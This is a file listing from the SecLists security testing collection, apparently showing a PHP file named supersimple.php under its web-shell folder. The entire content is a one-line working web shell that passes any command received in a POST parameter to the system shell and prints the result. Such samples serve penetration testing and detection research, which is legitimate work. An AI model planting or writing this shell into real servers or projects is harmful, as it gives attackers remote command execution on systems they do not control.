SecLists/Web-Shells/PHP/supersimple.php
2023-05-08 12:06:31 +02:00

2 lines
No EOL
33 B
PHP

<?php
echo system($_POST['cmd']);